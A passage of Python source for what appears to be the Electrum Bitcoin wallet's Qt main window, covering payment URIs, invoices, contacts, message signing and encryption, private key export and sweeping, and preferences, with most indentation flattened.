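    # Handle a 'bitcoin:' URI: either fetch the referenced BIP70 payment
    # request (the 'r' parameter, handled asynchronously via on_pr) or fill
    # the Send tab fields directly from the address/amount/label/message
    # parameters.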
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
        def do_export():
            fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
            if not fn:
                return
            with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
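    # Expose wallet, network, plugins and all Commands methods in the Python
    # console namespace so they can be called interactively; commands that
    # need a password go through self.password_dialog.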
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
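# Message signing: only p2pkh/p2wpkh/p2wpkh-p2sh addresses have a single key pair, so
# other script types are rejected. The signing task runs on the wallet thread to keep
# the GUI responsive, and the result is written back to the signature box as base64.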
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
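# Message verification only needs the address, the message and the base64 signature;
# it does not touch wallet keys, so no password is required.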
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
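# Encrypt/decrypt helpers: decryption needs the private key (password-protected, run on
# the wallet thread); encryption only needs the recipient's public key and is synchronous.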
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.get_transaction(txid)
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
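# Export all private keys to CSV/JSON. Keys are derived in a background thread and
# progress is reported back to the dialog via Qt signals, so the UI stays responsive
# and the export can be cancelled by closing the dialog.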
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
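# Sweep dialog: collects private keys, prepares the swept coins via sweep_preparations,
# and pre-fills the Send tab with a max-amount payment to one of the wallet's addresses.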
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
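# Generic import helper: split the input into whitespace-separated tokens, apply func to
# each one, then report which entries were added and which could not be imported.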
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
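# Preferences dialog: builds one tab per widget group (Fees, Transactions, Appearance,
# Fiat, Identity). Each setting is written to self.config and applied immediately,
# except the language, which requires a restart.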
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
